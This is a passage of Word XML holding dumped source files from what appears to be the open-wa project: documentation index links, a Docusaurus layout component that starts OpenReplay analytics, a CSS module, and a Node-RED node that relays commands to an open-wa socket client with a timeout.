          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogTemplate](/reference/structures/Dialog/interfaces/DialogTemplate.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [DialogValidation](/reference/structures/Dialog/interfaces/DialogValidation.md)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[CheckFunction](/reference/structures/Dialog/type-aliases/CheckFunction.md)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docs/docs/reference/structures/Dialog/index.md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docs/docs/reference/structures/MessageCollector/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># structures/MessageCollector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Classes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[MessageCollector](/reference/structures/MessageCollector/classes/MessageCollector.md)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docs/docs/reference/structures/MessageCollector/index.md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docs/docs/reference/structures/preProcessors/index.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># structures/preProcessors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Index</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[PREPROCESSORS](/reference/structures/preProcessors/enumerations/PREPROCESSORS.md)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Type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[MPConfigType](/reference/structures/preProcessors/type-aliases/MPConfigType.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- [MessagePreProcessor](/reference/structures/preProcessors/type-aliases/MessagePreProcessor.md)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Variables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[MessagePreprocessors](/reference/structures/preProcessors/variables/MessagePreprocessors.md)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docs/docs/reference/structures/preProcessors/index.md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docs/src/theme/DocRoot/Layout/index.tsx ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import React, {type ReactNode, useEffect, useState} from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import {useDocsSidebar} from '@docusaurus/plugin-content-docs/client';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import BackToTopButton from '@theme/BackToTopButton';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import DocRootLayoutSidebar from '@theme/DocRoot/Layout/Sidebar';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import DocRootLayoutMain from '@theme/DocRoot/Layout/Main';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import type {Props} from '@theme/DocRoot/Layout';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { initOpenReplay, startOpenReplayTracking } from '@site/src/components/OpenReplay/OpenReplay';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styles from './styles.module.css';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import useIsBrowser from '@docusaurus/useIsBrowser';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default function DocRootLayout({children}: Props): ReactNode {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const sidebar = useDocsSidebar();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [hasInitializedOpenReplay, setHasInitializedOpenReplay] = useState(false);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const isBrowser = useIsBrowser();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [hasInitialized, setHasInitialized] = useState(false);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [hiddenSidebarContainer, setHiddenSidebarContainer] = useState(false);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(isBrowser &amp;&amp; !hasInitialized) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      (async ()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initOpenReplay();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setHasInitializedOpenReplay(true);</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console.error('Failed to initialize OpenReplay:',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setHasInitialized(true);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[isBrowser, hasInitialized]);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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isBrowser &amp;&amp; hasInitializedOpenReplay &amp;&amp; window.location.hostname !== 'localhost') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      startOpenReplayTracking();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[hasInitializedOpenReplay]);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&lt;div className={styles.docsWrapper}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;BackToTopButton /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;div className={styles.docRoot}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        {sidebar &amp;&amp; (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;DocRootLayoutSidebar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            sidebar={sidebar.items}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            hiddenSidebarContainer={hiddenSidebarContainer}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            setHiddenSidebarContainer={setHiddenSidebarContainer}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          /&gt;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&lt;DocRootLayoutMain hiddenSidebarContainer={hiddenSidebarContainer}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          {children}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/DocRootLayoutMain&gt;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&lt;/div&gt;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docs/src/theme/DocRoot/Layout/index.tsx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docs/src/theme/DocRoot/Layout/styles.module.css ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.docRoot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width: 100%;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.docsWrapper {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  flex: 1 0 auto;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docs/src/theme/DocRoot/Layout/styles.module.css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integrations/node-red/src/nodes/cmd/cmd.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Client } from "@open-wa/socket-client";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { NodeInitializer } from "node-red";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { OwaServerNode } from "../owa-server/modules/types";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { CmdNode, CmdNodeDef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function tryParseJSONObject(jsonString: unknown) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (typeof jsonString === "object") return jsonString;</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//@ts-ignore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var o = JSON.parse(jsonString);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Handle non-exception-throwing cases:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Neither JSON.parse(false) or JSON.parse(1234) throw errors, hence the type-checking,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // but... JSON.parse(null) returns null, and typeof null === "object", </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // so we must check for that, too. Thankfully, null is falsey, so this suffices:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (o &amp;&amp; typeof o === "object") {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      return 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catch (e)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nodeInit: NodeInitializer = (RED): void =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  function CmdNodeConstructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this: CmdNode,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: CmdNodeDef</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RED.nodes.createNode(this,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this.name = config.name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.method = config.method;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.args = config.args;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.timeout = (config.timeout === "-1") ? -1 : parseFloat(config.timeout as string || "30") * 1000;</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(isNaN(this.timeout)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.timeout = 30000;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RED.httpAdmin.get("/node_red_init_call", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.server = RED.nodes.getNode(config.server) as OwaServerNode;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (!this.server?.client.socket) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "Please set a server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this.server?.client.socket.emit("node_red_init_call", (data: unknown) =&gt; res.json(data))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this.on("input", (msg, send, done) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const m = msg as {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        method?: string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        args?: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          [k: string]: boolean | string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method = m.method || this.method;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      let argmnts = m.args || {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ...(tryParseJSONObject(this.args) || {}),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ...(tryParseJSONObject(msg.payload)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argmnts = tryParseJSONObject(argmnts) || argmnts;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      let _t: any;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(config.server)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.server = RED.nodes.getNode(config.server) as OwaServerNode;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const executeCommand = () =&gt; this.server?.client.ask(method as any, argmnts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const timeoutPomise = this.timeout === -1 ? false : new Promise((res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        _t = setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          res('TIMEOUT')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        }, this.timeout)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proms = timeoutPomise ? () =&gt; Promise.race([executeCommand(), timeoutPomise]) : () =&gt; executeCommand()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const promWithHandler = () =&gt; (proms() as Promise&lt;any&gt;).then((payload) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (_t) clearTimeout(_t)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (payload === "TIMEOUT") this.status({ fill: 'red', shape: 'ring', text: `Timed out. Took longer than ${(this.timeout || 1000) / 1000} seconds`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this.status({ fill: 'green', shape: 'dot', text: 'Done' })</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          send({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            payload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(this.server &amp;&amp; this.server.client) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.status({ fill: 'yellow', shape: 'ring', text: 'Executing..' });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (this.server.clientSocket.connected) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          promWithHandler()</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this.status({ fill: 'red', shape: 'ring', text: 'Waiting for socket connection..' });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          this.server.addListener("connected", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
